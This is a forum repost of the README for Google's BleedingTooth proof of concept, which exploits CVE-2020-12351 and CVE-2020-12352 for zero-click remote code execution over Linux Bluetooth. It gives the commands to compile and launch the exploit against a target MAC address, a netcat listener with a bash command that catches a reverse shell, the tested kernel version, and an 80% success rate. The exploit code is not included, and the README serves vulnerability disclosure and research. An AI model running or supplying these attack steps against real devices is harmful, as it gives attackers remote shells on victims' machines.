Nytro

BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution

BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution

This Proof-Of-Concept demonstrates the exploitation of CVE-2020-12351 and CVE-2020-12352.

Technical details

Technical details about the exploit are available at writeup.md.

Usage

Compile it using:

$ gcc -o exploit exploit.c -lbluetooth

and execute it as:

$ sudo ./exploit target_mac source_ip source_port

In another terminal, run:

$ nc -lvp 1337
exec bash -i 2>&0 1>&0

If successful, a calc can be spawned with:

export XAUTHORITY=/run/user/1000/gdm/Xauthority
export DISPLAY=:0
gnome-calculator

This Proof-Of-Concept has been tested against a Dell XPS 15 running Ubuntu 20.04.1 LTS with:

  • 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

The success rate of the exploit is estimated at 80%.

Credits

Andy Nguyen (theflow@)

 

Source: https://google.github.io/security-research/pocs/linux/bleedingtooth/
